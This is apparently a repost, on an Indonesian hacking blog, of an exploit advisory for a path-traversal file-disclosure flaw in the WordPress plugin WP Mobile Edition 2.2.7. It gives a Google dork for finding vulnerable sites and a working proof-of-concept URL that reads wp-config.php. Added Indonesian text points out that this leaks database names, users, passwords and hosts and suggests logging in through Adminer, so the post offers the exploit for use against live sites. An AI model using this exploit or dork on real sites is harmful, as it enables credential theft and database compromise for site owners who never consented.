Exploit Title: Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability
Date: April 11, 2015
Exploit Author: @LookHin (Khwanchai Kaewyos)
Google Dork: inurl:?fdx_switcher=mobile
Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/
Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip
Version: WP Mobile Edition Version 2.2.7
Overview:
Wordpress Plugin 'WP Mobile Edition' is not filtering data in GET parameter 'files' in file 'themes/mTheme-Unus/css/css.php'
Search on Google
inurl:?fdx_switcher=mobile
POC
Exploit view source code wp-config.php
http://www.site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
Nanti akan tampak DB User, DB Name, DB password, DB host dll.
Kalau Mau di Adminer Host yang localhost tidak vuln
Support Idiot Attacker dengan klik subscribe di channel Disini, Banyak konten-konten Idiot attacker yg di upload disana.
Idiot Attacker
web hacking
Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability
Next
« Prev Post
« Prev Post
Previous
Next Post »
Next Post »
Subscribe to:
Post Comments (Atom)
0 Komentar